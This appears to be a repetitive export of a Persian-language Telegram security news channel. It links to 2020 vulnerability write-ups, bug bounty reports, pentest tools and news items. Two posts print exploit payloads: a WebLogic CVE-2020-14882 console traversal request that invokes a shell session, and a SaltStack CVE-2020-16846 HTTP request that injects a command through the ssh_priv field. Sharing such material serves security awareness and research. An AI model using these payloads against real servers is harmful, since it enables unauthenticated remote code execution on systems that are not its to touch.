امنیت اطلاعات
آسیب پذیری RCE در weblogic بدون نیاز به احراز هویت CVE-2020–14882 https://x.x.x.x:7001/console/images/%252E%252E%252Fconsole.portal POST: _nfpb=true&_pageLabel=&handle=https://com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime(…
GitHub
GitHub - jas502n/CVE-2020-14882: CVE-2020–14882、CVE-2020–14883
CVE-2020–14882、CVE-2020–14883. Contribute to jas502n/CVE-2020-14882 development by creating an account on GitHub.
اکسپلویت آسیب پذیری لو دادن اطلاعات در sharepoint مایکروسافت
CVE: CVE-2020-17017
https://srcincite.io/pocs/cve-2020-17017.py.txt
#sharepoint
#windows
@sec_nerd
CVE: CVE-2020-17017
https://srcincite.io/pocs/cve-2020-17017.py.txt
#sharepoint
#windows
@sec_nerd
برنامه نویس سابق مایکروسافت به ۹ سال حبس محکوم شد!
ولودیمیر کواشوک ۲۶ ساله که اهل اوکراین است از سال ۲۰۱۶ بعنوان یک برنامه نویس تمام وقت با مایکروسافت کار خود را شروع کرد و در سال ۲۰۱۸ این همکاری به پایان رسید.
او در طی این مدت در پروژه ی فروش آنلاین مایکروسافت مشغول به فعالیت بود که با سوء استفاده از دسترسی خود اقدام به دزدیدن CSV (چیزی شبیه به گیفت کارت) نمود.
در ابتدا او با دزدی مقادیر اندک کار خود را ادامه داد و تا ۱۲ هزار دلار از این طریق بدست آورد اما پس از آن به این مقدار اکتفا نکرد و دست به دزدی میلیون دلاری زد.
کواشوک در نهایت مقدار 2.8 میلیون دلار به سرقت برد. حالا او باید 8.34 میلیون دلار جریمه بپردازد و با ۱۸ عنوان اتهامی ۹ سال را در زندان بگذراند.
https://www.darkreading.com/attacks-breaches/former-microsoft-software-engineer-sentenced-to-9-years-in-prison/d/d-id/1339422
#news
#microsoft
@sec_nerd
ولودیمیر کواشوک ۲۶ ساله که اهل اوکراین است از سال ۲۰۱۶ بعنوان یک برنامه نویس تمام وقت با مایکروسافت کار خود را شروع کرد و در سال ۲۰۱۸ این همکاری به پایان رسید.
او در طی این مدت در پروژه ی فروش آنلاین مایکروسافت مشغول به فعالیت بود که با سوء استفاده از دسترسی خود اقدام به دزدیدن CSV (چیزی شبیه به گیفت کارت) نمود.
در ابتدا او با دزدی مقادیر اندک کار خود را ادامه داد و تا ۱۲ هزار دلار از این طریق بدست آورد اما پس از آن به این مقدار اکتفا نکرد و دست به دزدی میلیون دلاری زد.
کواشوک در نهایت مقدار 2.8 میلیون دلار به سرقت برد. حالا او باید 8.34 میلیون دلار جریمه بپردازد و با ۱۸ عنوان اتهامی ۹ سال را در زندان بگذراند.
https://www.darkreading.com/attacks-breaches/former-microsoft-software-engineer-sentenced-to-9-years-in-prison/d/d-id/1339422
#news
#microsoft
@sec_nerd
Dark Reading
Former Microsoft Software Engineer Sentenced to 9 Years in Prison
The 26-year-old was convicted earlier this year of wire fraud, money laundering, and filing false tax returns, among other charges.
👍1
نسخه چهارم ابزار معروف پسانفوذ cobalt strike دیکامپایل و بصورت متن باز و کرک شده در اختیار عموم قرار گرفت
https://www.bleepingcomputer.com/news/security/alleged-source-code-of-cobalt-strike-toolkit-shared-online/
سورس کد منتشر شده، سورس اصلی این ابزار نیست
کامنت کردن یک خط از کد برای کرک شدن آن کفایت میکند!
https://twitter.com/0xAmit/status/1326648804582563841
#tools
#post_exploitation
@sec_nerd
https://www.bleepingcomputer.com/news/security/alleged-source-code-of-cobalt-strike-toolkit-shared-online/
سورس کد منتشر شده، سورس اصلی این ابزار نیست
کامنت کردن یک خط از کد برای کرک شدن آن کفایت میکند!
https://twitter.com/0xAmit/status/1326648804582563841
#tools
#post_exploitation
@sec_nerd
اکسپلویت آسیب پذیری saltstack
CVE-2020-16846
PoC:
POST /run HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0
Accept: application/x-yaml
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 87
token=12312&client=ssh&tgt=pyn3rd&fun=a&roster=qwe&ssh_priv=aaa%26%20open%20-a%20Calculator
#rce
#saltstack
@sec_nerd
CVE-2020-16846
PoC:
POST /run HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0
Accept: application/x-yaml
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 87
token=12312&client=ssh&tgt=pyn3rd&fun=a&roster=qwe&ssh_priv=aaa%26%20open%20-a%20Calculator
#rce
#saltstack
@sec_nerd
رایت آپ کشف باگ ssrf به ارزش ۳۱ هزار دلار در سرویس مانیتورینگ ابر گوگل
https://nechudav.blogspot.com/2020/11/31k-ssrf-in-google-cloud-monitoring.html
#bugbounty
#google
#ssrf
@sec_nerd
https://nechudav.blogspot.com/2020/11/31k-ssrf-in-google-cloud-monitoring.html
#bugbounty
#ssrf
@sec_nerd
رایت آپ کشف باگ در مسنجر فیسبوک که منجر به لو دادن اکسس توکن های میلیونها کاربر میشود
https://medium.com/@guhanraja/how-i-found-the-facebook-messenger-leaking-access-token-of-million-users-8ee4b3f1e5e3
#bugbounty
#writeup
#facebook
@sec_nerd
https://medium.com/@guhanraja/how-i-found-the-facebook-messenger-leaking-access-token-of-million-users-8ee4b3f1e5e3
#bugbounty
#writeup
@sec_nerd
شناسایی و بروت فورس حسابهای active directory با kerbrute
https://github.com/ropnop/kerbrute
#AD
#windows
#privesc
@sec_nerd
https://github.com/ropnop/kerbrute
#AD
#windows
#privesc
@sec_nerd
GitHub
GitHub - ropnop/kerbrute: A tool to perform Kerberos pre-auth bruteforcing
A tool to perform Kerberos pre-auth bruteforcing. Contribute to ropnop/kerbrute development by creating an account on GitHub.
ترکیب سه آسیب پذیری برای تصاحب اکانت
SSRF-->Cloudflare bypass--> Rate limiting to account takeover.
https://medium.com/@logicbomb_1/tale-of-3-vulnerabilities-to-account-takeover-44ba631a0304
#writeup
#ssrf
@sec_nerd
SSRF-->Cloudflare bypass--> Rate limiting to account takeover.
https://medium.com/@logicbomb_1/tale-of-3-vulnerabilities-to-account-takeover-44ba631a0304
#writeup
#ssrf
@sec_nerd
This media is not supported in your browser
VIEW IN TELEGRAM
دور زدن محدودیت های redirect با هفت روش
https://elmahdi.tistory.com/4
#openredirect
#bugbounty
#pentest
@sec_nerd
https://elmahdi.tistory.com/4
#openredirect
#bugbounty
#pentest
@sec_nerd
ElMahdi - マハディ
Bypassing the Redirect filters with 7 ways
Hello Bug Bounty Hunters, In this writeup I will be explaining various scenarios on how to bypass Open Redirect Filters that will lead to Open Redirect> ATO [0x01] Bypass the OAUTH Protection Via Path-URI Open redirect: I already reported a report about simple…
یک منبع مناسب برای تهیه wordlist با هدفهای متنوع
https://wordlists.assetnote.io/
#wordlist
#fuzz
#pentest
@sec_nerd
https://wordlists.assetnote.io/
#wordlist
#fuzz
#pentest
@sec_nerd
یک رساله دکترا در خصوص تولید اکسپلویت
Greybox Automatic Exploit Generation for Heap Overflows in Language Interpreters
https://seanhn.files.wordpress.com/2020/11/heelan_phd_thesis.pdf
توضیحات مختصر
https://sean.heelan.io/2020/11/18/phd-thesis-greybox-automatic-exploit-generation-for-heap-overflows-in-language-interpreters/
#overflow
#exploit
@sec_nerd
Greybox Automatic Exploit Generation for Heap Overflows in Language Interpreters
https://seanhn.files.wordpress.com/2020/11/heelan_phd_thesis.pdf
توضیحات مختصر
https://sean.heelan.io/2020/11/18/phd-thesis-greybox-automatic-exploit-generation-for-heap-overflows-in-language-interpreters/
#overflow
#exploit
@sec_nerd
فایرفاکس اندروید به وبسایتها اجازه میدهد تمام کوکی های شما را بدست آورند
https://medium.com/bugbountywriteup/firefox-and-how-a-website-could-steal-all-of-your-cookies-581fe4648e8d
#android
#firefox
@sec_nerd
https://medium.com/bugbountywriteup/firefox-and-how-a-website-could-steal-all-of-your-cookies-581fe4648e8d
#android
#firefox
@sec_nerd
Medium
Firefox: How a website could steal all your cookies
This is a write up for CVE-2020–15647, explaining how webpages are capable of stealing files from your Android device, including but not…
تزریق شل در imageMagick
https://insert-script.blogspot.com/2020/11/imagemagick-shell-injection-via-pdf.html
این آسیب پذیری در بروزرسانی اخیر imageMagick برطرف شده است.
#imagemagick
#rce
@sec_nerd
https://insert-script.blogspot.com/2020/11/imagemagick-shell-injection-via-pdf.html
این آسیب پذیری در بروزرسانی اخیر imageMagick برطرف شده است.
#imagemagick
#rce
@sec_nerd
Blogspot
ImageMagick - Shell injection via PDF password
"Use ImageMagick® to create, edit, compose, or convert bitmap images. It can read and write images in a variety of formats (over 200) includ...
دور زدن فایروال akamai و اجرای حمله ی SSTI
https://cyc10n3.medium.com/rce-via-server-side-template-injection-ad46f8e0c2ae
#ssti
#rce
#akamai
@sec_nerd
https://cyc10n3.medium.com/rce-via-server-side-template-injection-ad46f8e0c2ae
#ssti
#rce
#akamai
@sec_nerd
Turning Blind Error Based SQL Injection into Exploitable Boolean One
https://ozguralp.medium.com/turning-blind-error-based-sql-injection-into-an-exploitable-boolean-one-85d6be3ca23b
#sqli
#pentest
@sec_nerd
https://ozguralp.medium.com/turning-blind-error-based-sql-injection-into-an-exploitable-boolean-one-85d6be3ca23b
#sqli
#pentest
@sec_nerd
Medium
Turning Blind Error Based SQL Injection Into An Exploitable Boolean One
While I was recently hunting on a promising host target, from my well configured (only checking SQLi) active scan results, I found out a…